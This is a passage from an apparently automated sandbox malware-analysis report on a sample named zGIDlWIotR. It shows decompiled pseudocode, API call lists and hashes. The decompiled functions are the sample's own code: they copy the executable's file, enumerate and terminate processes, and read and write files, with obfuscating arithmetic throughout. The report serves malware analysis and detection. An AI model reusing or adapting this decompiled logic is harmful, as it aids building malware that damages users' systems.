								}
								_t471 =  *0x3ce3a0;
								 *0x3ce014 = E0039CABC();
								_t412 = 0;
								continue;
							}
							 *(_t420 - 4) = LoadLibraryA(E0038CF90(__eflags, _t473, 0x1e0b, 0xb));
							_t240 = E0038CF90(__eflags, _t473, 0xbe3, 0xc);
							E00396570(0xb, _t238);
							_t266 = GetProcAddress( *(_t420 - 4), _t240);
							E00396570(0xc, _t240);
							_t412 = E0038CF90(__eflags, _t473, 0x1ad0, 0x202);
							_t62 =  &(_t412[1]); // 0x4
							_t332 = _t62;
							_t246 = _t332;
							_t453 = _t450 + 0x28;
							_t63 =  &(_t246[1]); // 0x5
							_t388 = _t63;
							do {
								_t375 =  *_t246;
								_t246 =  &(_t246[1]);
								__eflags = _t375;
							} while (_t375 != 0);
							_t247 = _t246 - _t388;
							__eflags = _t247;
							MessageBoxA(0, _t332,  &(_t412[1]) + _t247,  *_t412);
							_t333 =  *0x3ce040; // 0x80000000
							 *(_t420 - 4) = _t333;
							asm("fild dword [ebp-0x4]");
							 *(_t420 - 0x10) = _t473;
							_t473 =  *0x3ce450 +  *(_t420 - 0x10);
							 *0x3ce040 = E0039CABC();
							E00396570(0x202, _t412);
							_t433 = _t453 + 8;
							E0039DF62(0); // executed
							goto L52;
						}
						_t412 = E0038CF90(__eflags, _t471, 0x2c93, 9);
						_t255 = E00396AA0(_t266, _t254);
						_t493 =  *0x3ce5e4;
						_t379 =  *0x3ce1fc; // 0x80000000
						 *(_t420 - 0x18) = _t493;
						 *(_t420 - 4) = _t379 + 0x40011bf;
						asm("fild dword [ebp-0x4]");
						_t388 = _t255;
						 *(_t420 - 0x10) = _t493;
						asm("fsubr qword [ebp-0x10]");
						asm("fsubr qword [ebp-0x18]");
						 *0x3ce5e4 =  *0x3ce338;
						_t471 =  *0x3ce338;
						asm("fld1");
						asm("fsubp st1, st0");
						 *0x3ce338 = _t471;
						 *0x3ce1fc =  *0x3ce1fc + 1;
						E00396570(9, _t254);
						_t429 = _t429 + 0x18;
						__eflags = _t255;
						if(_t255 != 0) {
							goto L33;
						}
						_push(2);
						goto L34;
					}
					__eflags = _t136 - _t388;
					if(__eflags == 0) {
						goto L35;
					}
					goto L30;
				}
			}

0x003836d0
0x003836d0
0x003836d7
0x003836dc
0x003836df
0x003836e1
0x00000000
0x00000000
0x003836e3
0x003836e9
0x003836f5
0x003836fb
0x00383706
0x0038371a
0x00383720
0x00383722
0x00383728
0x0038372e
0x0038372f
0x00383732
0x003836d0
0x003836d0
0x003836d7
0x003836dc
0x003836df
0x003836e1
0x00000000
0x00000000
0x00000000
0x003836e1
0x003836d0
0x00383734
0x00383739
0x00383741
0x00383744
0x0038374e
0x00383751
0x0038375b
0x00383769
0x00383775
0x00383781
0x00383791
0x00383797
0x003837a9
0x003837ad
0x003837b5
0x003837b7
0x003837bc
0x003837bf
0x003837c1
0x00383833
0x00383833
0x0038383c
0x0038383c
0x00383842
0x00383848
0x0038384d
0x0038384e
0x00383854
0x00383857
0x0038385c
0x00383862
0x00383865
0x00383868
0x0038386b
0x0038386e
0x00383874
0x00383879
0x0038387c
0x0038387f
0x00383881
0x00383884
0x00383886
0x00383889
0x0038388b
0x00383892
0x0038389b
0x0038389b
0x0038389d
0x003838a0
0x003838a3
0x003838a3
0x003838ab
0x003838b7
0x003838c2
0x003838c5
0x003838c5
0x003838c7
0x003838c7
0x003838c9
0x003838cc
0x003838cd
0x003838cd
0x003838df
0x003838e5
0x003838f2
0x003838f7
0x003838ff
0x00383902
0x00383902
0x00383904
0x00383904
0x00383906
0x00383909
0x0038390a
0x0038390a
0x0038390e
0x00383916
0x00383916
0x00383918
0x00383918
0x0038391a
0x0038391d
0x0038391e
0x0038391e
0x00383926
0x0038392f
0x00383934
0x00383937
0x0038393e
0x00383a6d
0x00383a6d
0x00383a73
0x00383a74
0x00383a79
0x00383a7c
0x00383a7f
0x00383a87
0x00383a8b
0x00383a8d
0x00383a8f
0x00383a9b
0x00383a9e
0x00383aa4
0x00383aaa
0x00383ab0
0x00383ab3
0x00383ab6
0x00383ab9
0x00383ac1
0x00383ac7
0x00383acf
0x00383ad5
0x00383ad5
0x00383ada
0x00383aed
0x00383af6
0x00383af9
0x00383aff
0x00383b04
0x00383b11
0x00383b16
0x00383b1b
0x00383b1e
0x00383b1e
0x00383b20
0x00383b20
0x00383b27
0x00383b2d
0x00383b2e
0x00383b2e
0x00383b32
0x00383b37
0x00383b40
0x00383b40
0x00383b42
0x00383b43
0x00383b43
0x00383b4c
0x00383b4e
0x00383b50
0x00383b50
0x00383b51
0x00383b51
0x00383b54
0x00383b55
0x00383b55
0x00383b5b
0x00383b67
0x00383b67
0x00383b6a
0x00383b6a
0x00383b6c
0x00383b70
0x00383b70
0x00383b72
0x00383b73
0x00383b73
0x00383b7d
0x00383b7f
0x00383b81
0x00383b81
0x00383b82
0x00383b82
0x00383b85
0x00383b86
0x00383b86
0x00383b8c
0x00383b8f
0x00383b9a
0x00383ba2
0x00383ba2
0x00383ba2
0x00383baa
0x00383bac
0x00383bb5
0x00383bba
0x00383bbd
0x00383bbe
0x00383bbe
0x00383bc3
0x00383bca
0x00383bd1
0x00383bd6
0x00383bd9
0x00383bdb
0x00383be3
0x00383bf2
0x00383bf5
0x00383bf7
0x00383bfd
0x00383c03
0x00383c05
0x00383c0d
0x00383c12
0x00383c14
0x00383c17
0x00383c17
0x00383c1c
0x00383c27
0x00383c2a
0x00383c30
0x00383c33
0x00383c33
0x00383c39
0x00383c49
0x00383c52
0x00383c55
0x00383c5b
0x00383c62
0x00383c69
0x00383c6e
0x00383c71
0x00383c73
0x00383d2c
0x00383d2c
0x00383d2c
0x00383d30
0x00383d30
0x00383d3a
0x00383d3d
0x00383d40
0x00383d49
0x00383d4f
0x00383d53
0x00383d59
0x00383d5e
0x00383d61
0x00383d63
0x00000000
0x00000000
0x00383d65
0x00383d6c
0x00383d71
0x00383d79
0x00383d7f
0x00383d80
0x00383d83
0x00000000
0x00000000
0x00000000
0x00383d83
0x00383d8f
0x00383da3
0x00383db0
0x00383dbd
0x00383dc9
0x00383dd1
0x00383dd3
0x00383dd5
0x00383dd5
0x00383dd7
0x00383dd8
0x00383dd8
0x00383de2
0x00383de4
0x00383de6
0x00383de6
0x00383de7
0x00383de7
0x00383dea
0x00383deb
0x00383deb
0x00383df1
0x00383df8
0x00383e02
0x00383e02
0x00383e04
0x00383e0e
0x00383e1b
0x00383e23
0x00383e2e
0x00383e34
0x00383e3d
0x00383e40
0x00383e46
0x00383e49
0x00383e4c
0x00383e4e
0x00383e51
0x00383e59
0x00383e5f
0x00383e5f
0x00383e65
0x00383e6b
0x00383e73
0x00383e7f
0x00383e8d
0x00383e92
0x00383e9e
0x00383ea1
0x00383eaa
0x00383ead
0x00383ec5
0x00383ecb
0x00383ed1
0x00383ed9
0x00383ee1
0x00383ef0
0x00383f06
0x00383f19
0x00383f30
0x00383f36
0x00383f3d
0x00383f42
0x00383f44
0x00383f4e
0x00383f5b
0x00383f5b
0x00383f5d
0x00383f64
0x00383f64
0x00383f70
0x00383f75
0x00000000
0x00383c79
0x00383c79
0x00383c80
0x00383c92
0x00383ca8
0x00383cae
0x00383cb0
0x00383d16
0x00383d16
0x00383d1d
0x00383d22
0x00383d27
0x00000000
0x00383d27
0x00383cbb
0x00383cc1
0x00383cc8
0x00383ceb
0x00383cf2
0x00383cf7
0x00383cfa
0x00383cff
0x00383d0e
0x00383d13
0x00000000
0x00383d13
0x00383cd1
0x00383cd6
0x00383cd9
0x00383ce0
0x00000000
0x00000000
0x00383ce2
0x00383ce9
0x00000000
0x00000000
0x00000000
0x00383ce9
0x00383c73
0x00383944
0x00383952
0x00383957
0x0038395a
0x0038395c
0x00000000
0x00000000
0x0038396d
0x00383972
0x00383975
0x00383977
0x00000000
0x00000000
0x00383988
0x0038398d
0x00383990
0x00383992
0x00000000
0x00000000
0x003839a3
0x003839a8
0x003839ab
0x003839b0
0x003839b7
0x00383478
0x00383484
0x00383496
0x00383498
0x0038349d
0x003834a0
0x003834a2
0x003834a5
0x003834a5
0x003834b1
0x003834b4
0x003834b9
0x003834bf
0x003834c2
0x003834c5
0x003834c8
0x003834da
0x003834dc
0x003834de
0x003834e4
0x003834e6
0x003834ee
0x003834f1
0x003834f9
0x00383508
0x0038350b
0x00383511
0x00383514
0x00383517
0x0038351f
0x0038351f
0x00383531
0x00383533
0x00383536
0x00383538
0x00383538
0x0038353a
0x0038353b
0x00383547
0x00383549
0x00383550
0x00383550
0x00383553
0x00383554
0x0038355a
0x0038355d
0x00383567
0x00383569
0x0038356e
0x00383575
0x00383582
0x00383588
0x0038358a
0x00383594
0x00383594
0x0038359b
0x003835a2
0x003835a8
0x003835ab
0x003835b0
0x003835b0
0x003835b6
0x003835bb
0x003835c0
0x003835ce
0x003835d5
0x003835da
0x003835dd
0x003835df
0x003835e6
0x003835f7
0x003835fc
0x003835ff
0x00383601
0x00383603
0x00383606
0x00383606
0x00383615
0x00383615
0x003835c2
0x003835c2
0x003835c5
0x003835c5
0x0038361d
0x00383622
0x00383625
0x00383628
0x0038362a
0x00383634
0x00383639
0x0038363b
0x0038363b
0x0038363d
0x0038363f
0x00383641
0x00383643
0x00000000
0x00000000
0x00383659
0x00383665
0x00383671
0x00383673
0x0038367b
0x00383687
0x00383696
0x00383699
0x003836a5
0x003836a7
0x003836a7
0x003836b4
0x003836bf
0x003836c5
0x00000000
0x003836c5
0x003839dc
0x003839df
0x003839e9
0x003839fb
0x003839fd
0x00383a11
0x00383a13
0x00383a13
0x00383a16
0x00383a18
0x00383a1b
0x00383a1b
0x00383a20
0x00383a20
0x00383a22
0x00383a23
0x00383a23
0x00383a29
0x00383a29
0x00383a34
0x00383a36
0x00383a3c
0x00383a3f
0x00383a42
0x00383a4b
0x00383a59
0x00383a5e
0x00383a63
0x00383a68
0x00000000
0x00383a68
0x003837cf
0x003837d3
0x003837d8
0x003837de
0x003837e4
0x003837ed
0x003837f0
0x003837f6
0x003837f8
0x00383801
0x00383804
0x00383807
0x0038380d
0x00383813
0x00383815
0x00383817
0x0038381d
0x00383823
0x00383828
0x0038382b
0x0038382d
0x00000000
0x00000000
0x0038382f
0x00000000
0x0038382f
0x00383753
0x00383755
0x00000000
0x00000000
0x00000000
0x00383755

APIs

Part of subcall function 00392E30: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00392EEF
Part of subcall function 00392E30: Process32First.KERNEL32(00000000,?), ref: 00392F37

Sleep.KERNEL32(000007D0), ref: 00383728
__stat64i32.LIBCMT ref: 00383739
GetModuleFileNameA.KERNEL32(00000000,?,00000200), ref: 00383769
SetFileAttributesA.KERNEL32(74CB4EE1,00000080), ref: 00383775
CopyFileA.KERNEL32(?,74CB4EE1,00000000), ref: 00383797
GetCommandLineA.KERNEL32(00000000), ref: 003838B0
GetModuleFileNameA.KERNEL32(00000000,?,00000200), ref: 003838E5
LoadLibraryA.KERNEL32(00000000), ref: 003839CF
SetFileAttributesA.KERNEL32(74CB4EE1,00000080), ref: 0038384E

Part of subcall function 003896D0: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0038974D
Part of subcall function 003896D0: Process32First.KERNEL32(00000000,?), ref: 0038976F
Part of subcall function 003896D0: OpenProcess.KERNEL32(00000001,?,?,00000000), ref: 003897F3
Part of subcall function 003896D0: TerminateProcess.KERNEL32(00000000,000000FF), ref: 00389827
Part of subcall function 003896D0: CloseHandle.KERNEL32(00000000), ref: 0038982E
Part of subcall function 003896D0: Process32Next.KERNEL32(00000000,00000128), ref: 00389885

Memory Dump Source

Source File: 00000000.00000002.376906560.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true

Associated: 00000000.00000002.376889166.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.377032903.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.377073242.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.377090053.00000000003D3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_380000_zGIDlWIotR.jbxd

Similarity

API ID: File$Process32$AttributesCreateFirstModuleNameProcessSnapshotToolhelp32$CloseCommandCopyHandleLibraryLineLoadNextOpenSleepTerminate__stat64i32
String ID:
API String ID: 2063101344-0
Opcode ID: bcf24f0162a6d0dff253382273c6d279570f5ef28f159a08b423dab8ecb17e36
Instruction ID: 058c8fef068970618ad7f3d128c12f8ab420c1c594bd2d17154f374eb3c76580
Opcode Fuzzy Hash: bcf24f0162a6d0dff253382273c6d279570f5ef28f159a08b423dab8ecb17e36
Instruction Fuzzy Hash: 5A321671901305EBEF17AB60EC8AFAA7B79FB44B00F148499F545EB291EF306A14CB50

Uniqueness

Uniqueness Score: -1.00%

Function 00394560 Relevance: 12.2, APIs: 8, Instructions: 225
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 82%

			E00394560(void* __eflags, CHAR* _a4, long _a8, CHAR* _a12, intOrPtr _a16) {
				void* _v8;
				intOrPtr _v12;
				long _v16;
				long long _v24;
				void* __edi;
				void* __esi;
				short _t35;
				void* _t39;
				void* _t41;
				signed char _t43;
				CHAR* _t52;
				void* _t54;
				unsigned int _t55;
				void* _t58;
				void* _t59;
				void* _t62;
				CHAR* _t67;
				void* _t73;
				CHAR* _t75;
				intOrPtr _t78;
				signed int _t79;
				intOrPtr _t81;
				char _t82;
				void _t83;
				void _t84;
				signed int _t86;
				signed int _t91;
				void* _t93;
				void _t95;
				signed int _t97;
				char _t103;
				intOrPtr _t104;
				intOrPtr _t106;
				signed int _t107;
				short _t108;
				char* _t109;
				void _t110;
				signed int _t111;
				intOrPtr _t112;
				char* _t114;
				long _t116;
				void* _t118;
				void* _t123;
				intOrPtr _t128;
				void* _t129;
				void* _t130;
				void* _t132;
				void* _t133;
				void* _t134;
				void* _t135;
				void* _t136;
				void* _t137;
				void* _t140;
				void* _t143;
				void* _t146;
				long long _t164;
				long long _t173;
				long long _t175;

				_t35 =  *0x3ce108; // 0x5dc4
				_t104 =  *0x3ce4fc; // 0x94b9
				_push(_t129);
				_t116 = _a8;
				 *0x3ce530 =  *0x3ce530 + 0x742eb497 - _t35 - _t104;
				 *0x3ce108 =  *0x3ce108 + 1;
				_push(_t116);
				 *0x3ce020 = 0x829; // executed
				_t39 = E0039BE0A(_t116, _t129, __eflags); // executed
				_t137 = _t136 + 4;
				_t73 = _t39;
				_v8 = _t73;
				_t41 = CreateFileA(_a4, 0x80000000, 1, 0, 3, 0, 0); // executed
				_t130 = _t41;
				if(_t130 == 0xffffffff) {
					L17:
					_push(_v8);
					_t43 = E0039D7EC();
					_t78 =  *0x3ce378; // 0x1dce930
					_v12 = _t78;
					asm("fild dword [ebp-0x8]");
					_v24 = _t164;
					_v24 =  *0x3ce20c + _v24;
					_t106 =  *0x3ce158; // 0x0
					_v12 = _t106;
					asm("fild dword [ebp-0x8]");
					asm("fsubp st1, st0");
					asm("fcomp qword [ebp-0x14]");
					asm("fnstsw ax");
					 *0x3ce2f0 =  *0x3ce2f0 -  *0x3c75c8;
					asm("fld1");
					asm("fsubp st1, st0");
					if((_t43 & 0x00000001) != 0) {
						return _t43;
					}
					 *0x3ce328 =  *0x3ce328 -  *0x3c7a20;
					return _t43;
				}
				_t79 =  *0x3ce47c; // 0xd2bf0292
				_t107 =  *0x3ce0fc; // 0xe5101c30
				 *0x3ce0fc = _t79 * _t107;
				 *0x3ce47c =  *0x3ce47c - 1;
				ReadFile(_t130, _t73, _t116,  &_v16, 0); // executed
				FindCloseChangeNotification(_t130); // executed
				_t75 = _a12;
				E0038A010(0x104, _t75);
				_t173 =  *0x3ce584;
				_t81 =  *0x3ce460; // 0x6c98b0f1
				_v24 = _t173;
				_t108 =  *0x3ce524; // 0x0
				_v12 = _t81;
				asm("fild dword [ebp-0x8]");
				_v12 = _t108;
				asm("fsubr qword [ebp-0x14]");
				_v24 = _t173;
				asm("fild dword [ebp-0x8]");
				 *0x3ce524 = E0039CABC();
				_t175 =  *0x3ce584;
				asm("fld1");
				asm("faddp st1, st0");
				 *0x3ce584 = _t175;
				E003870D0(_t81, _t175, _t75, GetTickCount());
				_t52 = _t75;
				_t140 = _t137 + 0x10;
				_t109 =  &(_t52[1]);
				do {
					_t82 =  *_t52;
					_t52 =  &(_t52[1]);
				} while (_t82 != 0);
				 *((char*)(_t52 - _t109 + _t75 - 4)) = _t82;
				_t54 =  *0x3d031c; // 0x2d810d8
				_t132 = _t54;
				do {
					_t83 =  *_t54;
					_t54 = _t54 + 1;
				} while (_t83 != 0);
				_t55 = _t54 - _t132;
				_t118 = _t75 - 1;
				do {
					_t84 =  *(_t118 + 1);
					_t118 = _t118 + 1;
					_t154 = _t84;
				} while (_t84 != 0);
				_t86 = _t55 >> 2;
				memcpy(_t132 + _t86 + _t86, _t132, memcpy(_t118, _t132, _t86 << 2) & 0x00000003);
				_t58 = E0038CF90(_t154, _t175, 0x1611, 5);
				_t91 =  *0x3ce144; // 0x80fe1c2e
				_t143 = _t140 + 0x20;
				 *0x3ce144 = _t91 * 0xbdf326cf;
				_t93 = _t58;
				_t133 = _t58;
				do {
					_t110 =  *_t93;
					_t93 = _t93 + 1;
				} while (_t110 != 0);
				_t111 = _t93 - _t133;
				_t123 = _t75 - 1;
				do {
					_t95 =  *(_t123 + 1);
					_t123 = _t123 + 1;
				} while (_t95 != 0);
				_t97 = _t111 >> 2;
				_t59 = memcpy(_t123, _t133, _t97 << 2);
				memcpy(_t133 + _t97 + _t97, _t133, _t111 & 0x00000003);
				E00396570(5, _t59);
				_t112 =  *0x3ce4c0; // 0x94b914e2
				_t128 = _a16;
				_v12 = _t112;
				_t137 = _t143 + 0x20;
				asm("fild dword [ebp-0x8]");
				_v24 = _t175;
				_t164 =  *0x3ce084 + _v24;
				 *0x3ce1f0 = _t164;
				_t159 = _t128;
				if(_t128 < 0) {
					L15:
					_t62 = CreateFileA(_t75, 0x40000000, 0, 0, 2, 0, 0); // executed
					_t134 = _t62;
					if(_t134 != 0xffffffff) {
						WriteFile(_t134, _v8, _a8,  &_v16, 0); // executed
						CloseHandle(_t134);
					}
					goto L17;
				}
				_t135 = E0038CF90(_t159, _t164, 0x2ad5, 3);
				_t67 = _t75;
				_t146 = _t137 + 8;
				_t114 =  &(_t67[1]);
				do {
					_t103 =  *_t67;
					_t67 =  &(_t67[1]);
				} while (_t103 != 0);
				E0039D7F7(_t67 - _t114 + _t75, _t135, _t128);
				E00396570(3, _t135);
				_t137 = _t146 + 0x14;
				goto L15;
			}

0x00394566
0x0039456c
0x00394581
0x00394583
0x00394588
0x0039458e
0x0039459a
0x0039459b
0x003945a2
0x003945a7
0x003945b4
0x003945bf
0x003945c2
0x003945c8
0x003945cd
0x00394797
0x0039479a
0x0039479b
0x003947a0
0x003947a6
0x003947a9
0x003947b1
0x003947be
0x003947c7
0x003947cd
0x003947d0
0x003947d3
0x003947d5
0x003947d8
0x003947e6
0x003947f2
0x003947f4
0x003947ff
0x00394816
0x00394816
0x0039480d
0x00000000
0x0039480d
0x003945d3
0x003945d9
0x003945ea
0x003945f0
0x003945f7
0x003945fe
0x00394604
0x0039460d
0x00394612
0x00394618
0x0039461e
0x00394621
0x00394628
0x0039462b
0x00394631
0x00394637
0x0039463a
0x0039463d
0x00394648
0x0039464e
0x00394654
0x00394656
0x00394658
0x00394666
0x0039466b
0x0039466d
0x00394670
0x00394673
0x00394673
0x00394675
0x00394676
0x0039467c
0x00394680
0x00394685
0x00394687
0x00394687
0x00394689
0x0039468a
0x0039468e
0x00394690
0x00394693
0x00394693
0x00394696
0x00394697
0x00394697
0x0039469d
0x003946ae
0x003946b0
0x003946b5
0x003946bb
0x003946c4
0x003946ca
0x003946cc
0x003946d0
0x003946d0
0x003946d2
0x003946d3
0x003946d9
0x003946db
0x003946e0
0x003946e0
0x003946e3
0x003946e4
0x003946ea
0x003946ed
0x003946f7
0x003946f9
0x003946fe
0x00394704
0x00394707
0x0039470a
0x0039470d
0x00394710
0x00394719
0x0039471c
0x00394722
0x00394724
0x0039475e
0x0039476e
0x00394774
0x00394779
0x0039478a
0x00394791
0x00394791
0x00000000
0x00394779
0x00394732
0x00394734
0x00394736
0x00394739
0x00394740
0x00394740
0x00394742
0x00394743
0x0039474e
0x00394756
0x0039475b
0x00000000

APIs

CreateFileA.KERNELBASE(?,80000000,00000001,00000000,00000003,00000000,00000000,74CB4EE0,003840B1,?,003839A8,?,000000FF), ref: 003945C2
ReadFile.KERNELBASE(00000000,00000000,003839A8,?,00000000), ref: 003945F7
FindCloseChangeNotification.KERNELBASE(00000000), ref: 003945FE
GetTickCount.KERNEL32 ref: 0039465E

Part of subcall function 003870D0: __itow.LIBCMT ref: 00387152

_sprintf.LIBCMT ref: 0039474E
CreateFileA.KERNELBASE(?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 0039476E
WriteFile.KERNELBASE(00000000,?,?,?,00000000), ref: 0039478A
CloseHandle.KERNEL32(00000000), ref: 00394791

Memory Dump Source

Source File: 00000000.00000002.376906560.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true

Associated: 00000000.00000002.376889166.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.377032903.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.377073242.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.377090053.00000000003D3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_380000_zGIDlWIotR.jbxd

Similarity

API ID: File$CloseCreate$ChangeCountFindHandleNotificationReadTickWrite__itow_sprintf
String ID:
API String ID: 3244931751-0
Opcode ID: 731aa53bd469bfdfacb50245724b8accd1954e2f378e7e14673010e551eb862a
Instruction ID: c748658f1aab6963c40ffc624ca1c1001b1775f20e9345d0fdadd616e2a577dd
Opcode Fuzzy Hash: 731aa53bd469bfdfacb50245724b8accd1954e2f378e7e14673010e551eb862a
Instruction Fuzzy Hash: C5813471A00219ABDB06AF64EC99FBE7BBCFB89310F114055E981E7390DB306A25C791

Uniqueness

Uniqueness Score: -1.00%

Function 0038A9D0 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 169
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 79%

			E0038A9D0(intOrPtr _a4, long _a8, CHAR* _a12, intOrPtr _a16) {
				intOrPtr _v8;
				signed int _v12;
				void* _v16;
				long _v20;
				long long _v28;
				void _v20508;
				signed char _t31;
				signed char _t32;
				void* _t36;
				long _t39;
				intOrPtr _t42;
				intOrPtr _t52;
				intOrPtr _t58;
				intOrPtr _t60;
				intOrPtr _t62;
				intOrPtr _t63;
				intOrPtr _t67;
				intOrPtr _t69;
				intOrPtr _t70;
				intOrPtr _t72;
				intOrPtr _t75;
				intOrPtr _t77;
				intOrPtr _t78;
				intOrPtr _t79;
				intOrPtr _t82;
				signed int _t84;
				signed int _t85;
				long _t86;
				void* _t87;
				void* _t88;
				long long _t105;

				E0039CCA0(0x5018);
				_t31 =  *0x3ce294; // 0x5fbc
				_t60 =  *0x3ce288; // 0x6ce1ec48
				_t32 = _t31;
				_v12 =  *0x3c7820 -  *0x3ce354;
				_v16 = _t60 + _t32;
				_t85 = _t84 | 0xffffffff;
				asm("fild dword [ebp-0xc]");
				 *0x3ce288 =  *0x3ce288 + _t85;
				asm("fcomp qword [ebp-0x8]");
				asm("fnstsw ax");
				_t97 =  *0x3ce354;
				asm("fld1");
				asm("fsubp st1, st0");
				if((_t32 & 0x00000001) != 0) {
					_v12 =  *0x3ce438;
					_t97 =  *0x3ce3c8 * _v12;
					 *0x3ce438 =  *0x3ce3c8 * _v12;
				} else {
					 *0x3ce598 = 0xffffc37b;
				}
				_t62 =  *0x3d0284; // 0x490
				 *0x3ce060 = 0x675d;
				E0038F090(_t97, _t62);
				_t88 = _t87 + 4;
				if( *0x3cfc2c == 0) {
					_t36 = CreateFileA(_a12, 0x40000000, 0, 0, 2, 0, 0); // executed
					_v12 =  *0x3ce60c;
					_v16 = _t36;
					_v12 =  *0x3ce560 + _v12;
					 *0x3ce2e8 =  *0x3ce2e8 * _v12;
					_t105 =  *0x3ce60c;
					asm("fld1");
					asm("fsubp st1, st0");
					 *0x3ce60c = _t105;
					if(_t36 != _t85) {
						_t72 =  *0x3ce5d8; // 0xbe1d
						_t63 =  *0x3ce550; // 0xa046b428
						_t58 = _a4;
						 *0x3ce180 = _t63 + _t72;
						 *0x3ce5d8 =  *0x3ce5d8 + _t85;
						_t86 = _a8;
						_t82 = _a16;
						do {
							if(_t86 >= 0x5000) {
								_t105 =  *0x3ce300;
								asm("fsubr qword [0x3c7818]");
								 *0x3ce180 = E0039CABC();
								_t39 = 0x5000;
							} else {
								_t39 = _t86;
							}
							_v20 = _t39;
							E0039C200( &_v20508, _t58, _t39);
							_t42 = E00391B00(_t105,  &_v20508, 0x1400, _t82);
							 *0x3ce3ec =  *0x3ce3ec + 0x91f8c49f;
							_t88 = _t88 + 0x18;
							_t82 = _t42;
							WriteFile(_v16,  &_v20508, _v20,  &_v20, 0);
							_t75 =  *0x3ce140; // 0x5ea6
							_v8 = _t75;
							_t86 = _t86 - 0x5000;
							asm("fild dword [ebp-0x4]");
							_t58 = _t58 + 0x5000;
							_v12 = _t105;
							 *0x3ce5b8 =  *0x3ce5b8 * _v12;
							 *0x3ce010 =  *0x3ce010 - 1;
							_t105 =  *0x3ce518;
							_t67 =  *0x3ce010; // 0x39a8
							_v28 = _t105;
							_v8 = 0x7a54e45a - _t67;
							asm("fild dword [ebp-0x4]");
							asm("fsubr qword [ebp-0x18]");
							 *0x3ce518 = _t105;
						} while (_t86 > 0);
						CloseHandle(_v16);
						_t77 =  *0x3d0284; // 0x490
						E0038D240(_t105, _t77);
						return 1;
					} else {
						_t69 =  *0x3d0284; // 0x490
						E0038D240(_t105, _t69);
						_t78 =  *0x3ce38c; // 0x93fc1fee
						_t52 =  *0x3ce0e0; // 0xd349f562
						_t70 =  *0x3ce530; // 0xd924f815
						 *0x3ce0e0 = _t70 + _t52 - _t78;
						return 0;
					}
				} else {
					_t79 =  *0x3d0284; // 0x490
					E0038D240(_t97, _t79);
					return 0;
				}
			}

0x0038a9d8
0x0038a9e9
0x0038a9ef
0x0038a9f5
0x0038a9f6
0x0038a9fb
0x0038a9ff
0x0038aa02
0x0038aa05
0x0038aa0b
0x0038aa0e
0x0038aa10
0x0038aa16
0x0038aa18
0x0038aa23
0x0038aa39
0x0038aa42
0x0038aa45
0x0038aa25
0x0038aa2a
0x0038aa2a
0x0038aa4b
0x0038aa57
0x0038aa5d
0x0038aa62
0x0038aa6c
0x0038aa97
0x0038aaa3
0x0038aaa6
0x0038aab2
0x0038aabe
0x0038aac4
0x0038aaca
0x0038aacc
0x0038aace
0x0038aad6
0x0038ab09
0x0038ab10
0x0038ab1c
0x0038ab1f
0x0038ab26
0x0038ab2d
0x0038ab31
0x0038ab34
0x0038ab3a
0x0038ab40
0x0038ab46
0x0038ab51
0x0038ab57
0x0038ab3c
0x0038ab3c
0x0038ab3c
0x0038ab65
0x0038ab68
0x0038ab7a
0x0038ab7f
0x0038ab8c
0x0038ab98
0x0038aba3
0x0038aba9
0x0038abb3
0x0038abbb
0x0038abc1
0x0038abc4
0x0038abca
0x0038abd6
0x0038abdc
0x0038abe3
0x0038abe9
0x0038abf3
0x0038abf8
0x0038abfb
0x0038abfe
0x0038ac01
0x0038ac07
0x0038ac13
0x0038ac19
0x0038ac20
0x0038ac33
0x0038aad8
0x0038aad8
0x0038aadf
0x0038aae4
0x0038aaea
0x0038aaef
0x0038aafc
0x0038ab08
0x0038ab08
0x0038aa6e
0x0038aa6e
0x0038aa75
0x0038aa83
0x0038aa83

APIs

CreateFileA.KERNELBASE(?,40000000,00000000,00000000,00000002,00000000,00000000,181DD011,?,00000000), ref: 0038AA97
WriteFile.KERNELBASE(?,?,?,?,00000000,?,?,?,?,?,00000000,00000000,?,00000000), ref: 0038ABA3
CloseHandle.KERNEL32(?,?,?,?,?,?,00000000,00000000,?,00000000), ref: 0038AC13

Part of subcall function 0038D240: ReleaseMutex.KERNEL32(?,?,?), ref: 0038D267

Strings

ZTz, xrefs: 0038ABB6
Hl, xrefs: 0038A9EF, 0038AA05

Memory Dump Source

Source File: 00000000.00000002.376906560.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true

Associated: 00000000.00000002.376889166.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.377032903.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.377073242.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.377090053.00000000003D3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_380000_zGIDlWIotR.jbxd

Similarity

API ID: File$CloseCreateHandleMutexReleaseWrite
String ID: Hl$ZTz
API String ID: 1810904954-3457508641
Opcode ID: c9d7c60ed9d72cd5a5acd010f50092be1fca5da012b06de2dff80b9a0f7b4e26
Instruction ID: faaf3fe9587b8eeb2b2c66e0a5cf509fd863f9158b5675390e826128bab16e86
Opcode Fuzzy Hash: c9d7c60ed9d72cd5a5acd010f50092be1fca5da012b06de2dff80b9a0f7b4e26
Instruction Fuzzy Hash: 1D51F475900604DBEB06EF64FC44FAD7B7CFB44311F114595E844E32A0E738A960CB85

